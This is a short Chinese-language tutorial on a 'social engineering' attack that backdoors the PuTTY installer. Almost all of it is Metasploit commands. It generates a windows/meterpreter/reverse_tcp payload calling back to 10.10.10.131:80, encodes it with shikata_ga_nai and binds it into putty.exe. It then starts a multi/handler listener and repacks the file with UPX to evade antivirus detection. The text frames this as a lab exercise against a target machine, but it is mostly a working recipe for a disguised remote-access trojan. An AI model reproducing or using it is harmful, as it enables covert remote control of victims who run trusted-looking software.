社会工程学攻击案例-伪装木马
社会工程学攻击案例-伪装木马
msfpayload 做后门程序
root@bt:~# mkdir /root/example_01 //生成目录,名称为example_01 //将putty软件拷贝到此目录下(可以在gns3安装目录下找到或者到网上下载,注意要英文版) root@bt:~# cd /root/example_01/ //进入此文件夹 root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 R | msfencode -t exe -x /root/example_01/putty.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5 //生成后门程序,并将后门捆绑到putty软件(其他软件也通用) //管道符,将前面做好的指令传递给后面指令 root@bt:~/example_01# ll //查看本目录下增加的带有后门的putty程序
将目录下的 putty_backdoor.exe 拷贝到靶机。
启动监听程序。
root@bt:/pentest/exploits/framework2# /opt/framework/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=80 E msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 10.10.10.131 msf exploit(handler) > set LPORT 80 msf exploit(handler) > exploit
在靶机上安装杀毒软件,发现部分杀毒软件可以识别后台木马。通过 UPX 来实现加强免杀。
root@bt:~/example_01# upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe
将 putty_backdoor_upx6 软件放在靶机上,再次测试杀毒。
